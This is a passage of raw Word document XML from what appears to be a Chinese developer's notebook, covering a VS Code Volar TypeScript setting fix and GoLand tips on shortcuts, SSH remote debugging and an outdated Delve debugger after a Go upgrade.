      </w:r>
    </w:p>
    <w:p w14:paraId="02B6BC38" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "module": "commonjs",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F6FBC" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "noEmit": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E4C66" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "strict": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5D260" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4873E" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "files": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F50B40" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "./example.ts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD52CB" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D48912" w14:textId="2E1E0698" w:rsidR="002C38D2" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C4BFF" w14:textId="77777777" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0A685B" w14:textId="63603607" w:rsidR="004C4860" w:rsidRDefault="004C4860" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我看了下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">vscode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己配置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倒没啥问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02500068" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09424C4D" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753578B1" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDF700B" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000FB540" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6AD050" w14:textId="0AC7FF6D" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="822" w:name="_Toc159780243"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确思路</w:t>
      </w:r>
      <w:bookmarkEnd w:id="822"/>
    </w:p>
    <w:p w14:paraId="6614FC39" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF3A69A" w14:textId="36578BF9" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>ue Language Features(Volar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，修改此处即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBCF0E2" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617206E2" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "typescript.tsdk": "node_modules/typescript/lib",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F04CF" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "vue.server.path": ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DF2E4" w14:textId="19E86AF1" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68887299" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C22FD9" w14:textId="3CAC9CB8" w:rsidR="002C38D2" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为原本这里使用项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以不停的一直报错，因此如果想更换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，这里可以指定其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>npm prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的路径）的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D745B8F" w14:textId="77777777" w:rsidR="00A47D44" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC188F9" w14:textId="159F4A1C" w:rsidR="00A47D44" w:rsidRPr="0005316F" w:rsidRDefault="00A47D44" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005316F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我建议，这个错误还是直接忽略得了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202AD9EC" w14:textId="77777777" w:rsidR="002C38D2" w:rsidRDefault="002C38D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E2543E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC6B39A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="823" w:name="_Toc159780244"/>
      <w:r>
        <w:t>intellij调试技巧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="823"/>
    </w:p>
    <w:p w14:paraId="2AE4F60F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intellij</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开项目后，会生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.iml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.idea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0727F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF52BD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719F5EF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0B5326" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F818070" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="824" w:name="_Toc159780245"/>
      <w:bookmarkStart w:id="825" w:name="OLE_LINK37"/>
      <w:r>
        <w:t>Goland调试技巧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="824"/>
    </w:p>
    <w:bookmarkEnd w:id="825"/>
    <w:p w14:paraId="56294C43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095F7EAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="826" w:name="_Toc159780246"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用快捷键</w:t>
      </w:r>
      <w:bookmarkEnd w:id="826"/>
    </w:p>
    <w:p w14:paraId="2F8BB8F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E43E12E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err.nn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以快速打出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> err!=nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D226872" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0DA2E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="827" w:name="_Toc159780247"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加远程调试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="827"/>
    </w:p>
    <w:p w14:paraId="30B84DA8" w14:textId="53D8BCE7" w:rsidR="0070060F" w:rsidRPr="0070060F" w:rsidRDefault="0070060F" w:rsidP="0070060F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程通道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E2D76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接调试器这里新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建（不需要点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092E9A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="76215BA7" wp14:editId="78C60D1A">
            <wp:extent cx="3578860" cy="2080260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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280"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3578860" cy="2080260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A60B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这里配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FD3D66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="60F18CF6" wp14:editId="2DB9B693">
            <wp:extent cx="5152390" cy="2837180"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1270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281"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5152390" cy="2837180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2941A2" w14:textId="4110B38B" w:rsidR="004C452C" w:rsidRDefault="00650C37" w:rsidP="00650C37">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>添加远程部署映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5B1F6" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7206CFC6" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8E859E" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604B9007" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589EC958" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18248012" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FA41B8" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA29970" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC3A4A2" w14:textId="77777777" w:rsidR="00650C37" w:rsidRDefault="00650C37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C79395" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="828" w:name="_Toc159780248"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>delve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法调试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="828"/>
    </w:p>
    <w:p w14:paraId="2B7589A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572EB34B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法调试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A1261A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试时报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WARNING: undefined behavior - version of Delve is too old for Go version 1.20.0 (maximum supported version 1.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F95D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C63AC72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DB87BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查阅网上很多方法都不奏效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2D425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下为奏效方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C166BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://zhuanlan.zhihu.com/p/425645473</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F053A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC84E1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ git clone https://github.com/go-delve/delve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69E31C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
